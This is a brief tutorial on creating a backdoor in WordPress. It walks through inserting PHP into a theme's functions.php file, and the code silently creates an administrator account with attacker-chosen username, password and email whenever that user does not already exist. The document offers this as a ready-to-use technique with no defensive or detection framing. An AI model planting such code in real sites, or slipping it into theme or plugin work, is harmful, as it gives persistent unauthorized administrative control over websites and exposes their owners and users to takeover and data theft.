In this tutorial, we’ll discuss how backdoors can be created in WordPress
- Open the functions.php file of a WordPress theme.
- Insert the following code snippet at the beginning or end of the file:
$username = 'backdooruser';
$password = 'backdoorpassword';
$email = 'backdoor@example.com';
if (!username_exists($username)) {
$user_id = wp_create_user($username, $password, $email);
$user = new WP_User($user_id);
$user->set_role('administrator');
}
- Replace ‘backdooruser’, ‘backdoorpassword’, and ‘backdoor@example.com‘ with your desired username, password, and email address.
- This code creates a new administrator user if the specified username doesn’t already exist.